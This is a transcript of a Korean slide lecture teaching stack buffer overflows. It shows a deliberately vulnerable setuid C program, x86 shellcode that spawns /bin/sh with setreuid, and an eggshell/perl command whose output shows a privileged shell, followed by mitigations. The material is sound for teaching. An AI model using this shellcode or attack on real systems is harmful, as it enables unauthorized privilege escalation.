basic of buffer over flow
DESCRIPTION
Basic of Buffer Over Flow. S.S.G 방승원. Agenda. Introduction Memory Structure Stack Structure while Example Target Program Ready & Attack Attack & Security Application of Overflow. Introduction. Overflow ?? 넘치다 , 넘쳐 흐르다 ; 범람하다 ; < 용기 등이 > 가득 차다 , 넘치다 Buffer Over Flow ?? - PowerPoint PPT PresentationTRANSCRIPT
Basic of Buffer Over Flow
S.S.G 방승원
Agenda
• Introduction• Memory Structure• Stack Structure while Example• Target Program• Ready & Attack• Attack & Security• Application of Overflow
Introduction
• Overflow ?? –넘치다 , 넘쳐 흐르다 ; 범람하다 ;– < 용기 등이 > 가득 차다 , 넘치다
• Buffer Over Flow ??–정해진 메모리보다 많은 데이터를 입력 받아
특정 영역을 덮음으로써 프로그램 흐름을 바꿔 공격자가 원하는 코드를 실행하는 공격
–<Phrack Magazine 49-14>, Aleph One
Memory Structure
• TEXT : Program Code• DATA : Static Variable Global Variable• HEAP : Dynamic Allocation• STACK Dynamic Varbiable Local Variable
TEXTTEXT
DATADATA
HEAPHEAP
STACKSTACK
LOW
HIGH
Stack Structure
• LIFO(Last In First Out)
• PUSH
• POP
• SP(Stack Pointer)
• BP(Base Pointer)
STACKSTACK
Memory LOW(0x08048000)
MemoryHIGH(0xbfffffff)
Stack HIGH
PUSH
PUSH
Stack LOW BP
SP
POPPOP
Example Program
#include <stdio.h>
void func(int a, int b, int c){
int buf1;char buf2[16];
}void main(){
func(1, 2, 3);printf(“Hello, World!\n”);
}
Example Program
#include <stdio.h>
void func(int a, int b, int c){
int buf1;char buf2[16];
}void main(){
func(1, 2, 3);printf(“Hello, World!\n”);
}
STACKSTACK
Memory LOW(0x08048000)
MemoryHIGH(0xbfffffff)
Stack HIGH
Stack LOW EB
P
ESP
Example Program
main: pushl $3 pushl $2 pushl $1 call func addl $16, %esp
func: pushl %ebp movl %esp, %ebp subl $40, %esp leave (pop %ebp ret
STACKSTACK
Memory LOW(0x08048000)
MemoryHIGH(0xbfffffff)
Stack HIGH
Stack LOW
EBP
ESP
Target Program#include <stdio.h>#include <string.h>
void func(char *str){
char buf[64];strcpy(buf, str);
}
void main(int argc, char *argv[])
{func(argv[1]);printf(“Hello, World\n”);
}
• argc, argv프로그램을 실행 할 때 인자를 입력받는 방법ex) ./target bang 1234argv = 3;argv[0] = “target”;argv[1] = “bang”;argv[2] = “1234”;
• strcpy(dest, src)src 가 가르키는 문자열을 dest로 복사* 크기 제한이 없어 overflow 취약점 발생
Target Program
• Setuid Bit 가 걸려있음Set User ID Bit(number – 4000)
$ chmod 4755 target (or chmod u+s)-rwsr-xr-x 1 level1 level1 target 어떤 사용자든지 이 target 을 실행할 땐
level1 유저권한을 갖게 됨ex) passwd
• Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5
Target Program
• Let’s Run program With a lot of ‘A’ Character!!!
• Result : Segmentation Fault
• Why??
Target Program
#include <stdio.h>#include <string.h>
void func(char *str){
char buf[64];strcpy(buf, str);
}
void main(int argc, char *argv[])
{func(argv[1]);printf(“Hello, World\n”);
}
STACKSTACK
Memory LOW(0x08048000)
MemoryHIGH(0xbfffffff)
Stack HIGH
Stack LOW
EBP
ESP
Target Program
STACKSTACK
Memory LOW
MemoryHIGH
Stack HIGH
Stack LOW
$ ./target `perl -e 'print "A"x71'`
[ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes
Normal
Normal
Target Program
STACKSTACK
Memory LOW
MemoryHIGH
Stack HIGH
Stack LOW
$ ./target `perl -e 'print "A"x72'`
[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes
Overflow
Overflow
Target Program
STACKSTACK
Memory LOW
MemoryHIGH
Stack HIGH
Stack LOW
$ ./target `perl -e 'print "A"x80'`
[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ AAAA ][ AAAA ][ BBFFFFBB ]
64 Bytes 8 Bytes 4 Bytes 4 Bytes 4 Bytes
RealOverflo
w
RealOverflo
w
Target Programfunc: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave retmain: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp
STACKSTACK
Memory LOW(0x08048000)
MemoryHIGH(0xbfffffff)
Stack HIGH
Stack LOW
EBP
ESP
Target Programfunc: pushl %ebp movl %esp, %ebp subl $72, %esp subl $8, %esp pushl 8(%ebp) leal -72(%ebp), %eax pushl %eax call strcpy addl $16, %esp leave retmain: movl 12(%ebp), %eax addl $4, %eax pushl (%eax) call func addl $16, %esp subl $12, %esp
STACKSTACK
Memory LOW(0x08048000)
MemoryHIGH(0xbfffffff)
Stack HIGH
Stack LOW
EBP
ESP
0x41414141(??)
Shell Code• 쉘을 실행해주는 코드#include <unistd.h>void main(){
char *shell[2];
setreuid(3001, 3001);shell[0] = "/bin/sh";shell[1] = NULL;
execve(shell[0], shell, NULL);}
어셈코드
"\x31\xc0\x31\xdb\x31\xc9\x66\xbb”“\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46”“\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88””\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3””\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31””\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
Attack Ready
• Segmentation Fault 확인• 쉘코드 제작• 쉘코드를 버퍼에다 넣었을 때 , 그 버퍼의
주소를 찾아야 됨• But, 버퍼의 주소를 추측하기가 어려움• 그러므로 쉘 환경 변수에 쉘코드를 넣어서
사용하여 쉘코드의 주소를 계산해 주는 Eggshell 사용
Attack
bash-2.05b$ ./egg 512 200Using address: 0xbffffa60bash-2.05b$ ./target `perl -e 'print
"A"x76';(printf "\x60\xfa\xff\xbf")`sh-2.05b$ iduid=3001(level1) gid=1000(guest)
groups=1000(guest)sh-2.05b$
Attack V.S Security
• Non-executable Stack Return Into Libc Omega Project
• Stack Guard and Stack Shield Bypass Stack Guard and Stack Shield
• Random Stacks• Exec Shield( 커널수준 )
Exec Shield 회피• strcpy(), strcat(), gets(), fscanf(), scanf(), sprintf() 등 사용 자제 -> strncpy() strncat()
사용• And so on………
Application of Overflow
• Windows, Unix, Linux, Mac• Local, Remote• Web -> ActiveX• Heap Overflow• Integer Overflow• Frame Pointer Overwrite